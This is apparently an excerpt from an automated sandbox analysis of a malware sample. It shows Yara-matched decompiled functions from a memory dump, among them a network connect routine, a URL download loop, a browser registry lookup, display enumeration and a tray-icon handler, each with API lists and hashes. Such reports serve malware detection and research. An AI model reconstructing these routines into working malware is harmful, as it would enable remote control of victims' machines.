                                        • Instruction Fuzzy Hash: AE119375D04609EBCB00FBA0DD4E9FE7738EA94741750007AF812E31D1EB796A45CAAB
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0041203B, Relevance: 26.3, APIs: 13, Strings: 2, Instructions: 61timeCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 32%
                                        			E0041203B(char _a4, char _a20) {
				struct _SYSTEMTIME _v20;
				char _v36;
				char _v52;
				char _v68;
				char _v84;
				int _t18;
				char* _t26;
				char* _t27;
				char* _t28;
				char* _t29;

				if( *0x41bcac != 0) {
					GetLocalTime( &_v20);
					_t3 =  &(_v20.wSecond); // 0x4051ef
					_t26 =  &_v84;
					L00414176();
					_t27 =  &_v68;
					L00414170();
					_t28 =  &_v52;
					L00414140();
					_t29 =  &_v36;
					L00414170();
					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t29, _t28, _t28, _t27, _t27, _t26, _t26, "%02i:%02i:%02i:%03i ",  &_a4, " ",  &_a20, 0x415770, _v20.wHour & 0x0000ffff, _v20.wMinute & 0x0000ffff,  *_t3 & 0x0000ffff, _v20.wMilliseconds & 0x0000ffff);
					_t18 = printf(_t29);
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				}
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return _t18;
			}













                                        0x00412048
                                        0x00412052
                                        0x0041205d
                                        0x0041207e
                                        0x00412087
                                        0x00412090
                                        0x00412094
                                        0x0041209d
                                        0x004120a1
                                        0x004120aa
                                        0x004120ae
                                        0x004120b8
                                        0x004120bf
                                        0x004120cb
                                        0x004120d4
                                        0x004120dd
                                        0x004120e6
                                        0x004120e6
                                        0x004120ef
                                        0x004120f8
                                        0x004120ff

                                        APIs
                                        • GetLocalTime.KERNEL32(?), ref: 00412052
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                        • printf.MSVCRT ref: 004120BF
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$V10@$?c_str@?$basic_string@LocalTimeV10@0@V10@@printf
                                        • String ID: %02i:%02i:%02i:%03i $Q@
                                        • API String ID: 4249031962-3186260181
                                        • Opcode ID: 383fa367f66b16673637636e30dcf8b22da4594b4546bf8840b2870d857023be
                                        • Instruction ID: f3ca9ea98f16ce9d12e0c862744fbe2e8a9e2291361fb12ebe279ffe92a69474
                                        • Opcode Fuzzy Hash: 383fa367f66b16673637636e30dcf8b22da4594b4546bf8840b2870d857023be
                                        • Instruction Fuzzy Hash: 9311D3B680011DFBCF01EBE1EC49DEF7B7CBA54745B044026F912D2061EB789699CB54
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00405812, Relevance: 25.6, APIs: 17, Instructions: 138COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00402010: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?,?,0040E823,00000001,?,00000000), ref: 0040201E
                                          • Part of subcall function 0040209B: connect.WS2_32(0041BE70,0041BE74,00000010), ref: 004020B1
                                        • ?empty@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE_NXZ.MSVCP60 ref: 00405853
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00405868
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00405874
                                          • Part of subcall function 00412DDF: CreateFileW.KERNEL32(73BCF560,80000000,00000003,00000000,00000003,00000080,00000000,00000000,73BCF560,?,00409C9F,00000000), ref: 00412DF9
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000012), ref: 00405898
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004058AE
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 004058B7
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 004058CC
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 004058D6
                                          • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,00408CAD,00000000), ref: 004030B4
                                          • Part of subcall function 0040309E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 004030C0
                                          • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 004030D5
                                          • Part of subcall function 0040309E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004030DE
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,Function_0001B310), ref: 00405902
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?), ref: 00405922
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040590C
                                          • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                          • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,Function_0001B310), ref: 00405943
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040594D
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?), ref: 00405963
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405974
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040597F
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,Function_0001B310), ref: 00405994
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@D@2@@0@Hstd@@V10@0@V?$basic_string@$?c_str@?$basic_string@D@1@@$?data@?$basic_string@?length@?$basic_string@G@2@@std@@G@std@@V01@@$?empty@?$basic_string@CreateFileconnect
                                        • String ID:
                                        • API String ID: 257471410-0
                                        • Opcode ID: 6207ffe4a099ce9ea2bf100b0fc1d7ab3a8a9b3eb8558767b37f4f87605fa35e
                                        • Instruction ID: a7298ed754ce3842782531f55b1250d517e56450e3269786ed83483861d592cb
                                        • Opcode Fuzzy Hash: 6207ffe4a099ce9ea2bf100b0fc1d7ab3a8a9b3eb8558767b37f4f87605fa35e
                                        • Instruction Fuzzy Hash: 034152B2D00508ABCB05FBA1ED5A9EE7738DF54304B10407AE912B71D2EB795F48CB99
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00413C3F, Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 71windowCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 64%
                                        			E00413C3F(void* __ecx, struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				struct tagPOINT _v12;
				void* _t16;
				struct HMENU__* _t17;
				void* _t20;
				void* _t24;

				_t16 = _a8 - 1;
				if(_t16 == 0) {
					_t17 = CreatePopupMenu();
					 *0x41c1f0 = _t17;
					AppendMenuA(_t17, 0, 0, "Close");
					L15:
					return 0;
				}
				_t20 = _t16 - 0x110;
				if(_t20 == 0) {
					if(_a12 != 0) {
						goto L15;
					}
					Shell_NotifyIconA(2, 0x41c200);
					ExitProcess(0);
				}
				if(_t20 == 0x2f0) {
					_t24 = _a16 - 0x201;
					if(_t24 == 0) {
						if(IsWindowVisible( *0x41c1fc) == 0) {
							ShowWindow( *0x41c1fc, 9);
							SetForegroundWindow( *0x41c1fc);
						} else {
							ShowWindow( *0x41c1fc, 0);
						}
						goto L15;
					}
					if(_t24 == 3) {
						GetCursorPos( &_v12);
						SetForegroundWindow(_a4);
						TrackPopupMenu( *0x41c1f0, 0, _v12, _v12.y, 0, _a4, 0);
						goto L15;
					}
					_push(_a16);
					_push(_a12);
					_push(0x401);
					L4:
					return DefWindowProcA(_a4, ??, ??, ??);
				}
				_push(_a16);
				_push(_a12);
				_push(_a8);
				goto L4;
			}








                                        0x00413c47
                                        0x00413c48
                                        0x00413d1c
                                        0x00413d2c
                                        0x00413d31
                                        0x00413d37
                                        0x00000000
                                        0x00413d37
                                        0x00413c4e
                                        0x00413c53
                                        0x00413d03
                                        0x00000000
                                        0x00000000
                                        0x00413d0c
                                        0x00413d14
                                        0x00413d14
                                        0x00413c5e
                                        0x00413c7a
                                        0x00413c7f
                                        0x00413cd1
                                        0x00413ceb
                                        0x00413cf7
                                        0x00413cd3
                                        0x00413cdb
                                        0x00413cdb
                                        0x00000000
                                        0x00413cd1
                                        0x00413c84
                                        0x00413c97
                                        0x00413ca0
                                        0x00413cbb
                                        0x00000000
                                        0x00413cbb
                                        0x00413c86
                                        0x00413c89
                                        0x00413c8c
                                        0x00413c69
                                        0x00000000
                                        0x00413c6c
                                        0x00413c60
                                        0x00413c63
                                        0x00413c66
                                        0x00000000

                                        APIs
                                        • DefWindowProcA.USER32(?,00000401,?,?), ref: 00413C6C
                                        • GetCursorPos.USER32(?), ref: 00413C97
                                        • SetForegroundWindow.USER32(?), ref: 00413CA0
                                        • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 00413CBB
                                        • Shell_NotifyIconA.SHELL32(00000002,0041C200), ref: 00413D0C
                                        • ExitProcess.KERNEL32 ref: 00413D14
                                        • CreatePopupMenu.USER32 ref: 00413D1C
                                        • AppendMenuA.USER32 ref: 00413D31
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                        • String ID: Close
                                        • API String ID: 1657328048-3535843008
                                        • Opcode ID: 9fa95a8da91032cbadd5b612f76443252f964982233fd8ca9fbdea8ba32e519c
                                        • Instruction ID: 3a9117e372e52b2e565462b42d507c4b1172ca251bbe850fbb6b863f13e0a9c7
                                        • Opcode Fuzzy Hash: 9fa95a8da91032cbadd5b612f76443252f964982233fd8ca9fbdea8ba32e519c
                                        • Instruction Fuzzy Hash: 3A210972180609FBDB115FA4ED0DBEA3F35FB08702F208021F606A51B1D7799AA0EB5D
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040BD9B, Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 62COMMON
                                        Download Yara Rule
                                        APIs
                                        • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,HKLM,00000004,?,0040BE54,?,?,00000004), ref: 0040BDAE
                                        • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,HKCU,?,?,00000004), ref: 0040BDC6
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BE1E
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BE2B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@??8std@@D@2@@0@D@2@@std@@V?$basic_string@
                                        • String ID: HKCC$HKCR$HKCU$HKLM$HKU
                                        • API String ID: 2054586871-62392802
                                        • Opcode ID: a466e65ffd345a8b6a55af1eb436ab666088b088688f1f759b6253a5e0949071
                                        • Instruction ID: 2660231c1808b36434503ece8d2e95605cb547f4994df65369f224bebc220479
                                        • Opcode Fuzzy Hash: a466e65ffd345a8b6a55af1eb436ab666088b088688f1f759b6253a5e0949071
                                        • Instruction Fuzzy Hash: 8D01C43A58122AA2CE049AD0EC01ADA7708CF057B2F71007BAE04B76C0CB38D9854BCD
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004121E8, Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 51COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0040B5A2: RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,80000000), ref: 0040B5C3
                                          • Part of subcall function 0040B5A2: RegQueryValueExW.ADVAPI32(80000000,00412203,00000000,00000000,?,00000400), ref: 0040B5E2
                                          • Part of subcall function 0040B5A2: RegCloseKey.ADVAPI32(80000000), ref: 0040B5EB
                                          • Part of subcall function 0040B5A2: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00415800,?), ref: 0040B60A
                                        • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z.MSVCP60(.exe,00000000,?,?,?,?,?,?,?,?,?,00409BE6,?,00000000), ref: 00412210
                                        • ?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,-00000004,?,?,?,?,?,?,?,?,?,00409BE6,?,00000000), ref: 00412223
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,00409BE6,?,00000000), ref: 0041222D
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,00409BE6,?,00000000), ref: 00412236
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00409BE6,?), ref: 0041224F
                                          • Part of subcall function 0041290A: ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z.MSVCP60(?,00000000,6F60CB60,?,?,0041225E,?), ref: 00412919
                                          • Part of subcall function 0041290A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,?,?,0041225E,?), ref: 00412937
                                          • Part of subcall function 0041290A: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,0041225E,?), ref: 0041293F
                                          • Part of subcall function 0041290A: ?replace@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@IIPBG@Z.MSVCP60(00000000,00000000,?,?,0041225E,?), ref: 0041294A
                                          • Part of subcall function 0041290A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000,?,?,0041225E,?), ref: 00412954
                                          • Part of subcall function 0041290A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,0041225E,?), ref: 0041295D
                                          • Part of subcall function 0041290A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,0041225E,?), ref: 00412975
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00412265
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0041226E
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0041227B
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00412284
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$G@2@@std@@G@std@@U?$char_traits@$??0?$basic_string@??1?$basic_string@V01@@$??4?$basic_string@?find@?$basic_string@G@1@@V01@V12@$?length@?$basic_string@?replace@?$basic_string@?substr@?$basic_string@CloseOpenQueryValue
                                        • String ID: .exe$http\shell\open\command
                                        • API String ID: 2647146128-4091164470
                                        • Opcode ID: 252b6526ca8ce19ecb12a8c89719758da3f71089f7038446805540d7e0c89632
                                        • Instruction ID: d6ae35875aa51399811599ff5055279212e103e4be7b08956a6055bd29980306
                                        • Opcode Fuzzy Hash: 252b6526ca8ce19ecb12a8c89719758da3f71089f7038446805540d7e0c89632
                                        • Instruction Fuzzy Hash: F011127291061DEBCF04EBE0EC49FFD7738FB48304F544425F512A21A0DA74A148CB58
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0041000F, Relevance: 18.1, APIs: 12, Instructions: 81COMMON
                                        Download Yara Rule
                                        APIs
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00410020
                                        • EnumDisplayMonitors.USER32(00000000,00000000,0041010A,00000000), ref: 0041003D
                                        • EnumDisplayDevicesW.USER32(00000000,00000000,00000148,00000000), ref: 0041004D
                                        • EnumDisplayDevicesW.USER32(?,00000000,?,00000000), ref: 00410078
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,0041623C), ref: 00410095
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004100A0
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004100AC
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004100B5
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004100BE
                                        • EnumDisplayDevicesW.USER32(00000000,00000000,00000148,00000000), ref: 004100DF
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004100F5
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004100FE
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$DisplayEnum$??0?$basic_string@??1?$basic_string@Devices$G@1@@V01@@$G@2@@0@Hstd@@MonitorsV01@V10@V?$basic_string@Y?$basic_string@
                                        • String ID:
                                        • API String ID: 2807017801-0
                                        • Opcode ID: eb84855e3950ea35a9c7bfda1fc650b5d2b847637b3ce86eaa20f1cf7d9f2166
                                        • Instruction ID: 1aed4e64735882a0db0bb71c951f021fa06bcdcdb304fa8f35c3d61367e112a6
                                        • Opcode Fuzzy Hash: eb84855e3950ea35a9c7bfda1fc650b5d2b847637b3ce86eaa20f1cf7d9f2166
                                        • Instruction Fuzzy Hash: DE21DA7290111EEBDB509BA1DC88EEFBF7CEF19345F004166F50AE2050EB749689CBA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00401EA2, Relevance: 18.1, APIs: 12, Instructions: 80COMMON
                                        Download Yara Rule
                                        APIs
                                        • _EH_prolog.MSVCRT ref: 00401EA7
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?), ref: 00401EDE
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(Function_0001B310,?,Function_0001B310,0041B290), ref: 00401F05
                                          • Part of subcall function 00412718: _itoa.MSVCRT ref: 00412736
                                          • Part of subcall function 00412718: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040CC05,?,00000000,0041B310,00000000,0041B310,?), ref: 0041274A
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F1C
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F29
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F36
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F40
                                          • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                          • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000060), ref: 00401F55
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F5E
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F67
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F70
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F79
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V10@0@V?$basic_string@$??0?$basic_string@$D@1@@$?size@?$basic_string@H_prologV01@@_itoa
                                        • String ID:
                                        • API String ID: 3851886811-0
                                        • Opcode ID: 01e573960dee240ea2726ef75e9d492289b20872cd0126e6f5a200e95ae8709c
                                        • Instruction ID: 3c13f4a99a68d7d03b3b7bfc4098c6c0fbf2233efe5d64f965fa74e17679f3d5
                                        • Opcode Fuzzy Hash: 01e573960dee240ea2726ef75e9d492289b20872cd0126e6f5a200e95ae8709c
                                        • Instruction Fuzzy Hash: 3C212FB280010DEBCB05EBD1ED499EEBB78FB54315F14412AF412A7061EB755A48CBA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00412553, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103networkfileCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 88%
                                        			E00412553(void* __ecx, void* __eflags, char* _a4, void** _a8, unsigned int _a12, signed int _a15) {
				void* _v8;
				char* _v12;
				void* _v16;
				void _v10016;
				void* _t35;
				void* _t36;
				void* _t42;
				void* _t44;
				void* _t46;
				unsigned int* _t55;
				signed int _t57;
				signed int _t58;
				signed int _t64;
				signed int _t74;
				char* _t98;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t103;

				E00413ED0(0x271c, __ecx);
				_t55 = _a12;
				_a15 = _a15 & 0x00000000;
				_t98 = 0;
				 *_a8 = 0;
				 *_t55 = 0;
				_t35 = InternetOpenA("user", 1, 0, 0, 0);
				_v16 = _t35;
				_t36 = InternetOpenUrlA(_t35, _a4, 0, 0, 0x80000000, 0);
				_v8 = _t36;
				if(_t36 != 0) {
					_a12 = 0;
					_a4 = 0;
					while(1) {
						_t10 =  &_a12; // 0x415664
						_t42 = InternetReadFile(_v8,  &_v10016, 0x2710, _t10);
						if(_t42 != 0 && _a12 <= _t98) {
							break;
						}
						_t44 =  *_t55 + _a12;
						_push(_t44);
						L00413E84();
						_t57 =  *_t55;
						_t100 = _a4;
						_t58 = _t57 >> 2;
						_v12 = memcpy(_t44, _t100, _t58 << 2);
						_push(_a4);
						_t46 = memcpy(_t100 + _t58 + _t58, _t100, _t57 & 0x00000003);
						_t101 =  &_v10016;
						_t64 = _a12 >> 2;
						memcpy(_t101 + _t64 + _t64, _t101, memcpy(_t46 +  *_t55, _t101, _t64 << 2) & 0x00000003);
						_t103 = _t103 + 0x30;
						L00413EBE();
						_a4 = _v12;
						 *_t55 =  *_t55 + _a12;
						_t98 = 0;
					}
					_push( *_t55);
					L00413E84();
					_t102 = _a4;
					 *_a8 = _t42;
					_t74 =  *_t55 >> 2;
					memcpy(_t102 + _t74 + _t74, _t102, memcpy(_t42, _t102, _t74 << 2) & 0x00000003);
					_a15 = 1;
				}
				InternetCloseHandle(_v16);
				InternetCloseHandle(_v8);
				return _a15;
			}






















                                        0x0041255b
                                        0x00412564
                                        0x00412568
                                        0x0041256c
                                        0x00412573
